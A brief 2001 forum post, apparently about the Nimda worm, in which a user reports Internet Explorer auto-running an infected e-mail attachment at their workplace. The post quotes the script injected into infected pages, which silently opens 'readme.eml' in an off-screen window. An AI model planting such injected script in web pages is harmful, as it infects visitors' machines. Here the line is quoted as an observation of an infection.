I've seen both IE 4 and 5.5 run that e-mail attachment automaticially here. It's a mess here at my company right now. I'm still wondering when the IT guys are going to notice and shut down port 80 again, except to verified worm free servers again.

Usually when I have seen it, IE pops open a new window on the taskbar, with the text mshtml:// or something similar to that. I believe it depends on how your system accepts .eml files.

Update:
I just grabbed this from the bottom of a page here that is infected:
< html >< script language="JavaScript" >window.open("readme.eml", null, "resizable=no,top=6000,left=6000")< /script >< /html >

Edited by Drakino on 18/09/01 07:35 PM.